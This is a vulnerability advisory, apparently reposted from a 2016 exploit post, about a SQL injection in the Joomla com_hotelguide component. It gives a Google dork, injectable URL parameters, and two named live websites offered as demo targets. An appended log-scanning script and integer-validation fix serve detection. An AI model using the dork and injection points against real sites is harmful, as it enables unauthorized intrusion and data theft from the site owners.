Joomla com_hotelguide SQL injection

2016.01.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#[+] Title: Exploit com_hotelguide Sql injection
#[+] Product: Joomla
#[+] Vendor: http://joomla.com
#[+] Author : Dz MinD injector
#[+] Facebook : https://www.facebook.com/Dz.MinD.Injector
#[+] Type : proof of concept
#[+] Tested on : Windows7
#[+] Date : 25/01/2016

######## [ Proof / Exploit ] ################|=>
#! Google Dork :
#+ inurl:index.php?option=com_hotelguide
#[+] Special Thanks : Howucan team
#[+] Visit : http://howucan.gr/
Freedom To Palestine <3

#########################[!] Description ##################################

The SQL injection can enable an attacker to gain full administrative access to a target website when combined with other security weaknesses in Joomla!
The SQL injection was discovered in a core module of Joomla!
The "Itemid=" and "id=" fields in '/index.php?option=com_hotelguide&view=country&Itemid=' and '/index.php?option=com_hotelguide&view=city&id=' are not properly sanitized, which leads to an SQL injection vulnerability.

#########################[!] Proof Of Concept ##################################

http://localhost/path/index.php?option=com_hotelguide&view=city&id='[ inject Here ]
http://localhost/path//index.php?option=com_hotelguide&view=country&Itemid='[ inject Here ]

##Demo :
http://www.agrituristabruzzo.it/index.php?option=com_hotelguide&view=city&id=34'
http://www.stsitalia.it/index.php?option=com_hotelguide&view=country&Itemid=157'

!+ Find More targets in Google ^_^
!+ Greetings to my Friends : Sige-Dz , Sami Joker , Vatou-Dz & All Algerian Hackerz !
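For site operators, an added detection example (not part of the original advisory and not code from the component): it scans web access logs for com_hotelguide requests whose "id" or "Itemid" value is not a plain integer, which is the input the description says is left unsanitized. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisory names as unsanitized; both should carry integers only.
NUMERIC_PARAMS = ("id", "Itemid")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"[0-9]{1,10}")

def suspicious_params(url):
    """Return {param: decoded value} for non-integer id/Itemid on com_hotelguide."""
    query = parse_qs(urlsplit(url).query)  # parse_qs percent-decodes values
    if "com_hotelguide" not in query.get("option", []):
        return {}
    bad = {}
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):  # covers repeated parameters too
            if not INT_RE.fullmatch(value):
                bad[name] = value
    return bad

def scan(lines):
    """Yield (client_ip, url, bad_params) for each flagged access-log line."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        bad = suspicious_params(m.group(1))
        if bad:
            yield line.split(" ", 1)[0], m.group(1), bad

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [25/Jan/2016:10:01:02 +0000] "GET /index.php?option=com_hotelguide&view=city&id=34 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Jan/2016:10:01:05 +0000] "GET /index.php?option=com_hotelguide&view=city&id=34%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Jan/2016:10:01:09 +0000] "GET /index.php?option=com_hotelguide&view=country&Itemid=157' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Jan/2016:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=12-about HTTP/1.1" 200 900 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, url, bad in scan(SAMPLE_LOG):
        print(ip, url, bad)
```

The same integer-only rule is the mitigation on the application side: cast or validate both parameters as integers before they reach a query.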



Copyright 2024, cxsecurity.com

 
